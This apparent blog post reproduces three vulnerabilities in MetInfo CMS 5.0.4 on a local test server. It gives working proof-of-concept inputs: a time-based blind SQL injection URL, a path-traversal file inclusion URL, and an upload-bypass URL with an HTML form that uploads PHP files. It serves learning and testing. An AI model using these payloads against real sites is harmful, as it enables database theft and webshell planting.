metinfov5.0.4漏洞复现
metinfov5.0.4漏洞复现
最近学习,metinfov5.0.4漏洞复现,个人感觉这次的漏洞还是比较有意思的,为什么呢?原因是这次的3个漏洞都跟一个漏洞有关,这个漏洞就是变量覆盖覆盖漏洞.
简单讲就是用户传进去的值变成了一个新的变量覆盖了原代码的变量,从而被我们利用.
产生的原因是因为编程人员在进行变量传值时,使用了双(“$$”)符号 .
下面开始漏洞复现
测试环境:
phpstudy #一个集成环境包含php+mysql
php源码(cms)
metinfov5.0.4 #源码大家可以去网上下载
测试目标:
三个经典漏洞:
SQLi(注入)
文件包含
文件上传
漏洞位置:
SQLi 注入漏洞位置:
http://localhost/metinfoV5.0.4/about/show.php?lang=cn&id=22
POC:
http://localhost/metinfoV5.0.4/about/show.php?lang=cn&id=22 and if(ord(substr(database(),1,1))=109,sleep(5),0) –+
此处采用盲注,POC的语句解释为,首先获取数据库名称,然后截取第一个字符,将截取到的字符转换为ASCII码与猜想的ASCII码做比较,如果满足条件,也是说我们猜想正确,沉睡5秒,以此来爆出库名,之后以此类推,爆表,字段,内容等等,当我们得到第一个字符后,我们可以进入数据库和我们的库名进行比较,发现第一个字符一致,证明注入成功.
文件包含漏洞位置:
http://localhost/metinfoV5.0.4/about/index.php
POC: http://localhost/metinfoV5.0.4/about/index.php?fmodule=7&module=../../phpinfo.php
为了帮助我们更好的理解,我们可以先在www目录下写一个phpinfo.php的文件,接着使用文件包含进行打开,发现成功打开,证明了此处存在文件包含漏洞.
文件上传漏洞位置:
http://localhost/metinfoV5.0.4/admin/include/uploadify.php
POC:
http://localhost/MetInfoV5.0.4/admin/include/uploadify.php?tablepre=xx&met_lang=met_lang&lang=cn&met_admin_table=met_admin_table%20where%20usertype=3%23&metinfo_admin_id=1&metinfo_admin_pass=2&type=upfile&met_file_format=jpg|pphphp
为了便于利用,我们把它写成一个HTML文件:
<meta charset="utf-8">
<form
enctype="multipart/form-data"method="post"name="myfrom"action="http://localhost/MetInfoV5.0.4/admin/include/uploadify.php?tablepre=xx&met_lang=met_lang&lang=cn&met_admin_table=met_admin_table%20where%20usertype=3%23&metinfo_admin_id=1&metinfo_admin_pass=2&type=upfile&met_file_format=jpg|pphphp"
><input name="Filedata" type="file" size=20><input type="submit" name="Submit" value="提交信息">
</form>
之后我们只要打开写好的html文件选择.php格式的文件上传就可以了!上传成功后,我们进入该网站的upload/file/目录下,发现我们的上传文件,证明,文件上传漏洞实现.
到此,漏洞复现基本完成,剩下的就是漏洞产生的原因了,由于时间有限,就不一一分析原因了,大家有兴趣的可以去分析源代码,来找出产生的原因.
metinfov5.0.4漏洞复现相关推荐
- Xxe漏洞 php,PhpSpreadsheet 1.5.0 XXE漏洞复现及分析
0x01 前言 PhpSpreadsheet是一个非常流行的纯 PHP 类库,能够让你方便的读写Excel.LibreOffic Calc等表格格式的文件,是PHPExcel的替代者.2018年11月 ...
- 【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析
年后趁着需要做安全测试系统不多的这个空档,学学python到处逛逛复现复现和分析一些简单的漏洞 --from Lyricbao 0x00 复现环境 phpstudy wordpress 4.4版本 Q ...
- 【漏洞复现】泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
0x01 漏洞概述 泛微e-office是泛微旗下的一款标准的协同移动办公平台. 泛微e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可 ...
- Thinkphp历史漏洞复现
Thinkphp简介 Thinkphp 是一种开源框架.是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架. 很多cms(内容管理系统)就是基于 thin ...
- vc++ 6.0 创建程序快捷方式的一个例子源码_漏洞复现:phpcms v9.6.0任意文件上传漏洞(CVE201814399)...
文章说明 漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习.源码下载连接在文章最后. 漏洞说明 PH ...
- ewebeditor文件上传漏洞2.8.0版本(漏洞复现)
漏洞概述 ewebeditor 是常用的网站后台编辑器,此编辑器有asp等版本. 登陆后台之后,可以通过修改上传文件白名单的方法,任意文件上传. 漏洞危害等级 高危 影响版本 v2.8.0 漏洞复现 ...
- ThinkPHP 5.0.23 远程代码执行 漏洞复现
ThinkPHP 5.0.23 远程代码执行 漏洞复现 一.漏洞描述 二.漏洞影响 三.漏洞复现 1. 环境搭建 2. 漏洞复现 四.漏洞POC 五.参考链接 六.利用工具 一.漏洞描述 ThinkP ...
- ECShop-v3.0.0漏洞复现
ECShop-v3.0.0漏洞复现 配置文件写入导致代码执行 HTTP Host头部攻击导致任意页面跳转 HTTP Host头部攻击导致前台任意密码重置 后台任意文件删除 后台SQL注入 配置文件写入 ...
- thinkphp 5.0.23 rce漏洞复现
thinkphp 5.0.23 rce漏洞复现 thinkphp介绍 thinkphp是一个快速.兼容而且简单的轻量级国产php开发框架,支持windows/Unix/linux等服务器环境,并且有相 ...
最新文章
- 聊聊用户裂变的那些事
- mysql 5.7.22初始密码_mysql5.7.22安装
- postgres 备份 恢复
- python图片通道分离
- 弹性地基梁板法计算原理_地基下沉别慌张!沉着冷静用对地基加固法
- Java基础-方法(2)和数组
- python numpy array转置_Python numpy数组转置与轴变换
- 【软件分析与挖掘】Vision of Software Clone Management: Past, Present, and Future (Keynote Paper)...
- 排序sort,统计wc
- Windows 取消 Lock Screen 显示
- Docker 运行Tensorboard 和 jupyter的正确方法
- jQuery内置函数map和each的用法
- Nvidia显卡驱动升级
- Redis -- 数据库常用命令大全
- 使用小丸工具箱进行极限视频压缩
- oracle数据库基本语句
- AmiGO2:在线浏览和查询GO信息的利器
- Nessus插件包20220925
- Source Generator实战
- 一个程序员未来5年的自我规划